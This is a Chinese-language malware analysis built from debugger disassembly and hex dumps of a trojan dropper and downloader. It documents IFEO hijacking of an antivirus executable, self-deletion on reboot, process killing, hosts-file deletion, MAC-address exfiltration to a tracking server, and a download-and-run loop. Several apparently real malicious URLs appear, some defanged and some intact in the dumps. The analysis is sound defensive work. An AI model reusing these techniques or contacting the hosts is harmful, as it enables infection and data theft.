0040B580 8D4C24 08 lea ecx,dword ptr ss:[esp+8]
0040B584 50 push eax
0040B585 51 push ecx
0040B586 68 02000080 push 80000002
0040B58B E8 90EDFFFF call 0040A320 ; 0040A320
0040B590 6A 00 push 0
0040B592 6A 00 push 0
0040B594 68 70984000 push 409870 ; ASCII "zzzzzzzz"
0040B599 6A FF push -1
0040B59B E8 F0EBFFFF call 0040A190 ; 0040A190
0040B5A0 68 AC464000 push 4046AC ; ASCII "services.exe"
0040B5A5 FF15 70104000 call dword ptr ds:[401070] ; KERNEL32.lstrlenA
0040B5AB 8B5424 04 mov edx,dword ptr ss:[esp+4]
0040B5AF 40 inc eax
0040B5B0 50 push eax
0040B5B1 68 AC464000 push 4046AC ; ASCII "services.exe"
0040B5B6 6A 01 push 1
0040B5B8 6A 00 push 0
0040B5BA 68 64984000 push 409864 ; ASCII "Debugger"
0040B5BF 52 push edx
0040B5C0 E8 ABEDFFFF call 0040A370 ; 0040A370
0012FE00 0012FFA8 ASCII "egui.exe"
0012FE04 0012FFA8 ASCII "egui.exe"
在SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options\
新建一个egui.exe子项,在其中写入名为Debugger的值,内容为services.exe(IFEO劫持:之后启动egui.exe时实际运行的是services.exe).
大忽悠....
00409D9C 68 74B84000 push 40B874 ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~228278.ex"
00409DA1 FFD6 call esi ; KERNEL32.MoveFileExA
不是毁尸灭迹过了吗?
0012FE10 00409DC1 /CALL 到 MoveFileExA 来自 复件_a.00409DBF
0012FE14 0012FE2C |ExistingName = "C:\Documents and Settings\Administrator\桌面\复件 a.exe"
0012FE18 00000000 |NewName = NULL
0012FE1C 00000004 \Flags = DELAY_UNTIL_REBOOT
猥琐的自删除(MoveFileExA的NewName=NULL加MOVEFILE_DELAY_UNTIL_REBOOT,等于重启时删除自身)...可惜有OD在 ^_^
00409DCD 8B35 A4104000 mov esi,dword ptr ds:[4010A4] ; USER32.GetMessageA
00409DD3 53 push ebx
00409DD4 53 push ebx
00409DD5 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DD8 53 push ebx
00409DD9 50 push eax
00409DDA FFD6 call esi
00409DDC 85C0 test eax,eax
00409DDE 74 1D je short 00409DFD ; 00409DFD
00409DE0 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DE3 50 push eax
00409DE4 FF15 A0104000 call dword ptr ds:[4010A0] ; USER32.TranslateMessage
00409DEA 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DED 50 push eax
00409DEE FF15 90104000 call dword ptr ds:[401090] ; USER32.DispatchMessageA
00409DF4 53 push ebx
00409DF5 53 push ebx
00409DF6 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DF9 53 push ebx
00409DFA 50 push eax
00409DFB ^ EB DD jmp short 00409DDA ; 00409DDA
进入消息循环.恩,这家伙的苦力活终于干完了.
;>>>>>>>>>>>>>>>>>>>>>>>
B.EXE为功能下载者.分析如下:
;>>>>>>>>>>>>>>>>>>>>>>>
004014A2 FF15 28104000 call dword ptr ds:[401028] ; KERNEL32.GetSystemDirectoryA
004014A8 8B3D 24104000 mov edi,dword ptr ds:[401024] ; KERNEL32.lstrcatA
004014AE 8D85 74FEFFFF lea eax,dword ptr ss:[ebp-18C]
004014B4 68 D8114000 push 4011D8 ; ASCII "\drivers\etc\hosts"
004014B9 50 push eax
004014BA FFD7 call edi
004014BC 8D85 74FEFFFF lea eax,dword ptr ss:[ebp-18C]
004014C2 68 80000000 push 80
004014C7 50 push eax
004014C8 FF15 20104000 call dword ptr ds:[401020] ; KERNEL32.SetFileAttributesA
一开场立马抚摸一下hosts文件:SetFileAttributesA(...,80)即FILE_ATTRIBUTE_NORMAL,先去掉只读等属性.
0040191F 8AC3 mov al,bl
00401921 B1 03 mov cl,3
00401923 2C 27 sub al,27
00401925 8BFE mov edi,esi
00401927 F6E9 imul cl
00401929 000433 add byte ptr ds:[ebx+esi],al
0040192C 83C9 FF or ecx,FFFFFFFF
0040192F 33C0 xor eax,eax
00401931 43 inc ebx
00401932 F2:AE repne scas byte ptr es:[edi]
00401934 F7D1 not ecx
00401936 49 dec ecx
00401937 3BD9 cmp ebx,ecx
00401939 ^ 72 D2 jb short 0040190D ; 0040190D
0040193B 5D pop ebp
字符串解码.风格和主EXE一样,一看就是一个人写的...函数地址为004018F0
解码结果:
00401208 75 73 65 72 69 6E 69 74 2E 65 78 65 00 00 00 00 userinit.exe....
0040153A 68 24124000 push 401224 ; ASCII "ghjgh"
0040153F 6A 01 push 1
00401541 53 push ebx
00401542 FF15 14104000 call dword ptr ds:[401014] ; KERNEL32.CreateMutexA
创建ghjgh互斥
00401771 68 A0124000 push 4012A0 ; ASCII "GetTempPathA"
00401776 56 push esi
00401777 FF15 34104000 call dword ptr ds:[401034] ; KERNEL32.GetProcAddress
又找临时目录.不用想,肯定准备干坏事.
00401569 FF15 08104000 call dword ptr ds:[401008] ; KERNEL32.GetTickCount
0040156F 50 push eax
00401570 56 push esi
00401571 68 18124000 push 401218 ; ASCII "%s~%x.dat"
00401576 68 DC244000 push 4024DC ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~3deca9.dat"
0040157B FF15 60104000 call dword ptr ds:[401060] ; USER32.wsprintfA
又用GetTickCount产生一个数,按"%s~%x.dat"格式给临时目录下的.DAT文件命名.
0040158E FF15 28104000 call dword ptr ds:[401028] ; KERNEL32.GetSystemDirectoryA
00401594 53 push ebx
00401595 53 push ebx
00401596 53 push ebx
00401597 68 95234000 push 402395
0040159C 53 push ebx
0040159D 53 push ebx
0040159E FF15 04104000 call dword ptr ds:[401004] ; KERNEL32.CreateThread
获取系统目录,紧接着创建线程.402395是函数头.
004015C3 8B35 64104000 mov esi,dword ptr ds:[401064] ; USER32.GetMessageA
004015C9 53 push ebx
004015CA 53 push ebx
004015CB 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015CE 53 push ebx
004015CF 50 push eax
004015D0 FFD6 call esi
004015D2 85C0 test eax,eax
004015D4 74 1D je short 004015F3 ; 004015F3
004015D6 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015D9 50 push eax
004015DA FF15 68104000 call dword ptr ds:[401068] ; USER32.TranslateMessage
004015E0 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015E3 50 push eax
004015E4 FF15 70104000 call dword ptr ds:[401070] ; USER32.DispatchMessageA
004015EA 53 push ebx
004015EB 53 push ebx
004015EC 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015EF 53 push ebx
004015F0 50 push eax
004015F1 ^ EB DD jmp short 004015D0 ; 004015D0
004015F3 5F pop edi
又是消息循环.直接看402395.
009EFF98 71 71 2E 65 78 65 00 B2 qq.exe.
009EFFA8 63 6D 64 2E 65 78 65 00 cmd.exe.
解码
00401120 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
00401130 6E 2F 63 32 2F 67 65 74 6D 61 63 2E 61 73 70 00 n/c2/getmac.asp.
看名字应该是MAC统计
00402420 FF15 18104000 call dword ptr ds:[401018] ; KERNEL32.lstrcmpiA
009EFE64 009EFE9C |String1 = "[System Process]"
009EFE68 009EFFA0 \String2 = "qq.exe"
找QQ进程.想干嘛?
009EFE64 009EFE9C |String1 = "[System Process]"
009EFE68 009EFFA8 \String2 = "cmd.exe"
找CMD.想干嘛?
0040245E FFB5 CCFEFFFF push dword ptr ss:[ebp-134]
00402464 57 push edi
00402465 6A 01 push 1
00402467 E8 B4F3FFFF call 00401820 ; 00401820
0040246C 57 push edi
0040246D 50 push eax
0040246E FF15 44104000 call dword ptr ds:[401044] ; KERNEL32.TerminateProcess
00402474 8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-13C]
想干掉...
004018BF 8BF0 mov esi,eax
004018C1 68 E4124000 push 4012E4 ; ASCII "Process32Next"
004018C6 56 push esi
004018C7 FF15 34104000 call dword ptr ds:[401034] ; KERNEL32.GetProcAddress
猥琐的循环
00402489 68 30750000 push 7530
0040248E E8 BDF1FFFF call 00401650 ; 00401650
00402493 ^ E9 4AFFFFFF jmp 004023E2 ; 004023E2
睡30秒继续循环.....看来不能让他睡,把前面的跳转改掉,反正这里他怎么找也找不到.
这里发现如果没有找到QQ的进程就会直接退出,无奈,我只好欺骗1下下他的感情,告诉他已经找到了.
0040241F 50 push eax
00402420 FF15 18104000 call dword ptr ds:[401018] ; KERNEL32.lstrcmpiA
00402426 85C0 test eax,eax
00402428 75 1F jnz short 00402449 ; 00402449
0040242A 68 E4134000 push 4013E4 ; ASCII "zQz"
0040242F 68 C8244000 push 4024C8
00402434 68 E0104000 push 4010E0 ; ASCII "x2"
00402439 56 push esi
0040243A C745 FC 0100000>mov dword ptr ss:[ebp-4],1
00402441 E8 E4F6FFFF call 00401B2A ; 00401B2A
改掉00402428的跳转,让他不跳,表示找到了,接着跟
009EFDF0 00 00 00 00 00 00 00 00 00 00 00 00 49 6E 74 65 ............Inte
009EFE00 72 6E 65 74 43 6C 6F 73 65 48 61 6E 64 6C 65 00 rnetCloseHandle.
009EFE10 49 6E 74 65 72 6E 65 74 4F 70 65 6E 55 72 6C 41 InternetOpenUrlA
009EFE20 00 FD 9E 00 49 6E 74 65 72 6E 65 74 4F 70 65 6E .秊.InternetOpen
009EFE30 41 00 00 00 77 69 6E 69 6E 65 74 2E 64 6C 6C 00 A...wininet.dll.
解码字符串.
009EFCF8 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
009EFD08 6E 2F 63 32 2F 67 65 74 6D 61 63 2E 61 73 70 3F n/c2/getmac.asp?
009EFD18 78 3D 26 79 3D 78 32 26 74 3D 7A 51 7A 26 7A 3D x=&y=x2&t=zQz&z=
009EFD28 36 39 38 64 35 31 26 6D 3D 00 79 00 73 00 74 00 698d51&m=.y.s.t.
009EFD38 65 00 6D 00 00 00 00 00 00 00 00 00 00 e.m..........
拼装字符串,顺便访问.
0012FE00 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C URLDownloadToFil
0012FE10 65 41 00 7C 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 eA.|urlmon.dll.
解码出URLDownloadToFileA,要开工了...
0012FDB0 00401F45 返回到 ~228278.00401F45 来自 URLMON.URLDownloadToFileA
0012FDB4 00000000
0012FDB8 00401078 ASCII "http://txt.ykwoo.com/xx.txt"
0012FDBC 004024DC ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~4d899c.dat"
将此TXT下载为.DAT
00401F38 53 push ebx
00401F39 53 push ebx
00401F3A 57 push edi
00401F3B FF75 08 push dword ptr ss:[ebp+8]
00401F3E 53 push ebx
00401F3F FF15 BC254000 call dword ptr ds:[4025BC] ; URLMON.URLDownloadToFileA
00401F45 3BC3 cmp eax,ebx
00401F47 A3 D4114000 mov dword ptr ds:[4011D4],eax
00401F4C 74 10 je short 00401F5E ; 00401F5E
00401F4E 68 E02E0000 push 2EE0
00401F53 E8 F8F6FFFF call 00401650 ; 00401650
00401F58 46 inc esi
00401F59 3B75 10 cmp esi,dword ptr ss:[ebp+10]
00401F5C ^ 7C DA jl short 00401F38 ; 00401F38
循环下载.我手工下载了一下,内容如下:
添加无用符号,防止误点
http:--//ri.nutua.com/img/1.exe
http:--//ri.nutua.com/img/2.exe
http:--//ri.nutua.com/img/3.exe
http:--//ri.nutua.com/img/4.exe
http:--//ri.nutua.com/img/5.exe
http:--//ri.nutua.com/img/6.exe
http:--//ri.nutua.com/img/7.exe
http:--//ri.nutua.com/img/8.exe
http:--//ri.nutua.com/img/9.exe
http:--//ri.nutua.com/img/10.exe
http:--//ri.nutua.com/img/11.exe
http:--//ri.nutua.com/img/12.exe
http:--//ri.nutua.com/img/13.exe
http:--//ri.nutua.com/img/14.exe
http:--//ri.nutua.com/img/15.exe
http:--//ri.nutua.com/img/16.exe
http:--//ri.nutua.com/img/17.exe
http:--//ri.nutua.com/img/18.exe
http:--//ri.nutua.com/img/19.exe
http:--//ri.nutua.com/img/20.exe
http:--//ri.nutua.com/img/21.exe
http:--//ri.nutua.com/img/22.exe
http:--//ri.nutua.com/img/23.exe
http:--//ri.nutua.com/img/24.exe
http:--//ri.nutua.com/img/25.exe
http:--//ri.nutua.com/img/26.exe
http:--//ri.nutua.com/img/27.exe
http:--//ri.nutua.com/img/28.exe
http:--//ri.nutua.com/img/29.exe
http:--//ri.nutua.com/img/30.exe
http:--//ri.nutua.com/img/31.exe
http:--//ri.nutua.com/img/32.exe
http:--//ri.nutua.com/img/33.exe
http:--//ri.nutua.com/img/34.exe
http:--//ri.nutua.com/img/35.exe
http:--//ri.nutua.com/img/36.exe
http:--//ri.nutua.com/img/37.exe
http:--//ri.nutua.com/img/38.exe
http:--//ri.nutua.com/img/39.exe
0012FDCC 004017C8 /CALL 到 DeleteFileA 来自 ~228278.004017C6
0012FDD0 004025C4 \FileName = "C:\WINDOWS\system32\drivers\etc\hosts"
删掉hosts文件(前面已用SetFileAttributesA去掉了它的属性)...
0012FDD4 004010EC ASCII "http://txt.ykwoo.com/ad.txt"
又要下载....
0040198C 68 10134000 push 401310 ; ASCII "Netbios"
00401991 68 00134000 push 401300 ; ASCII "NETAPI32.dll"
00401996 E8 AFFFFFFF call 0040194A ; 0040194A
004024C8 30 30 2D 30 43 2D 32 39 2D 39 44 2D 43 31 2D 35 00-0C-29-9D-C1-5
004024D8 35 5
获取MAC
0012FC70 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
0012FC80 6E 2F 77 31 2F 67 65 74 6D 61 63 2E 61 73 70 3F n/w1/getmac.asp?
0012FC90 78 3D 30 30 2D 30 43 2D 32 39 2D 39 44 2D 43 31 x=00-0C-29-9D-C1
0012FCA0 2D 35 35 26 79 3D 78 32 26 7A 3D 36 39 38 64 35 -55&y=x2&z=698d5
0012FCB0 31 26 6D 3D 31 34 35 34 1&m=1454
把网卡MAC地址等信息拼进URL参数(x=MAC,y=x2,z=698d51,m=...)发给统计服务器.
00401078 68 74 74 70 3A 2F 2F 74 78 74 2E 79 6B 77 6F 6F http://txt.ykwoo
00401088 2E 63 6F 6D 2F 78 78 2E 74 78 74 00 00 00 00 00 .com/xx.txt.....
00401098 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
004010A8 00 00 00 00 68 74 74 70 3A 2F 2F 74 67 2E 66 73 ....http://tg.fs
004010B8 30 38 2E 63 6E 2F 77 31 2F 67 65 74 6D 61 63 2E 08.cn/w1/getmac.
004010C8 61 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 asp.............
004010D8 00 00 00 00 00 00 00 00 78 32 00 00 00 00 00 00 ........x2......
004010E8 00 00 00 00 68 74 74 70 3A 2F 2F 74 78 74 2E 79 ....http://txt.y
004010F8 6B 77 6F 6F 2E 63 6F 6D 2F 61 64 2E 74 78 74 00 kwoo.com/ad.txt.
00401108 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00401118 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F 2F 74 ........http://t
00401128 67 2E 66 73 30 38 2E 63 6E 2F 63 32 2F 67 65 74 g.fs08.cn/c2/get
00401138 6D 61 63 2E 61 73 70 00 00 00 00 00 00 00 00 00 mac.asp.........
00401148 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00 ...............
00401158 68 74 74 70 3A 2F 2F 64 2E 6E 64 78 77 71 2E 63 http://d.ndxwq.c
00401168 6F 6D 2F 78 78 2E 65 78 65 00 00 00 00 00 00 00 om/xx.exe.......
00401178 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00401188 00 00 00 00 36 39 38 64 35 31 00 00 00 00 00 00 ....698d51......
00401198 00 00 00 00 0A 00 00 00 68 74 74 70 3A 2F 2F 64 ........http://d
004011A8 2E 6E 64 78 77 71 2E 63 6F 6D 2F 74 2F 78 32 2E .ndxwq.com/t/x2.
004011B8 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 exe.............
004011C8 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ...............
004011D8 5C 64 72 69 76 65 72 73 5C 65 74 63 5C 68 6F 73 \drivers\etc\hos
004011E8 74 73 00 00 00 00 00 00 43 6F 6E 73 6F 6C 65 57 ts......ConsoleW
004011F8 69 6E 64 6F 77 43 6C 61 73 73 00 00 63 6D 64 00 indowClass..cmd.
00401208 75 73 65 72 69 6E 69 74 2E 65 78 65 00 00 00 00 userinit.exe....
00401218 25 73 7E 25 78 2E 64 61 74 00 00 00 67 68 6A 67 %s~%x.dat...ghjg
00401228 68 00 00 00 BA EA DF D8 D8 D8 C8 D2 00 00 00 00 h...宏哓刎纫....
00401238 65 78 65 00 57 69 6E 45 78 65 63 00 6B 65 72 6E exe.WinExec.kern
00401248 65 6C 33 32 2E 64 6C 6C 00 00 00 00 53 6C 65 65 el32.dll....Slee
00401258 70 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C p...KERNEL32.DLL
00401268 00 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 ....FindWindowA.
00401278 55 53 45 52 33 32 2E 44 4C 4C 00 00 50 6F 73 74 USER32.DLL..Post
00401288 4D 65 73 73 61 67 65 41 00 00 00 00 4D 65 73 73 MessageA....Mess
00401298 61 67 65 42 6F 78 41 00 47 65 74 54 65 6D 70 50 ageBoxA.GetTempP
004012A8 61 74 68 41 00 00 00 00 44 65 6C 65 74 65 46 69 athA....DeleteFi
004012B8 6C 65 41 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 leA.CloseHandle.
004012C8 4F 70 65 6E 50 72 6F 63 65 73 73 00 50 72 6F 63 OpenProcess.Proc
004012D8 65 73 73 33 32 46 69 72 73 74 00 00 50 72 6F 63 ess32First..Proc
004012E8 65 73 73 33 32 4E 65 78 74 00 00 00 25 64 00 00 ess32Next...%d..
004012F8 2A 00 00 00 39 39 00 00 4E 45 54 41 50 49 33 32 *...99..NETAPI32
00401308 2E 64 6C 6C 00 00 00 00 4E 65 74 62 69 6F 73 00 .dll....Netbios.
循环解码,批量下载运行再下载再运行.天生干苦力的
添加无用符号,防止误点
http:--//txt.ykwoo.com/xx.txt
http:--//txt.ykwoo.com/ad.txt
http:--//d.ndxwq.com/t/x2.exe
http:--//d.ndxwq.com/xx.exe
后面的活就交给这些链接里面的木马去干了.